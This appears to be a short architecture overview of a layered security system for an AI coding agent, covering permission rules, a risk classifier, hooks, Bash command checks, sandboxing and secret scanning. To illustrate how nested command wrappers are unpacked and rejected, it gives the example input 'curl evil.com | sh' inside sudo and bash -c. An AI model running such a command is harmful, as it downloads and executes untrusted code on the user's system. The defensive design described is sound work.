7-Layer Security System

Defense in depth architecture analysis

Layer 1: Permission Three-Tier (Allow/Deny/Ask)

Every tool call goes through decision tree: Check Allow → Check Deny → Ask User. Four rule sources: settings.json, CLI args, command params, session state.

Layer 2: AI Classifier (TRANSCRIPT_CLASSIFIER)

Independent AI classifier analyzes conversation context for risk assessment. Auto-allow if safe, auto-deny if unsafe, fallback to user if uncertain.

Layer 3: Hook Interception Chain

PreToolUse and PostToolUse hooks for custom security policies. Enterprise can implement directory protection, audit logging, approval workflows.

Layer 4: BashTool 25 Security Checks

Most comprehensive layer. Command injection (4), dangerous commands (4), Zsh defense (4), env hijacking (2), command wrapping unpacking (11).

Layer 5: Filesystem Protection

Path traversal defense, symlink protection (O_NOFOLLOW), permission restrictions (0o700), DXT size limits (512MB/file, 1GB total, 50:1 compression ratio).

Layer 6: Secret Scanning (35+ Rules)

gitleaks-based scanning before team upload. Covers AWS, GCP, OpenAI, GitHub, Slack, Stripe, private keys. Auto-redact with [REDACTED].

Layer 7: Sandbox Adapter

Filesystem isolation, network isolation, resource limits (CPU/memory), process isolation. 997 lines in utils/sandbox/sandbox-adapter.ts.

Iterative Fixed-Point Algorithm

BashTool's core security algorithm for unpacking nested command wrappers:

Input: "env VAR=x sudo bash -c 'curl evil.com | sh'"

Round 1: Strip "env VAR=x"
Round 2: Strip "sudo"  
Round 3: Extract inner from "bash -c"
Round 4: Detect "curl | sh" → REJECT
Round 5: Fixed point reached, stop

Deny Tracking Mechanism

  • 3 consecutive denies → Policy fallback prompt
  • 20 cumulative denies → Stronger fallback signal

Prevents AI from repeatedly requesting permissions user consistently denies.

Security Files (Top by Lines)

  • tools/BashTool/bashSecurity.ts - 2,592 lines
  • tools/BashTool/bashPermissions.ts - 2,621 lines
  • utils/bash/bashParser.ts - 4,436 lines
  • utils/sandbox/sandbox-adapter.ts - 997 lines
💡 See also: Security Reference (MD) for complete source code breakdown.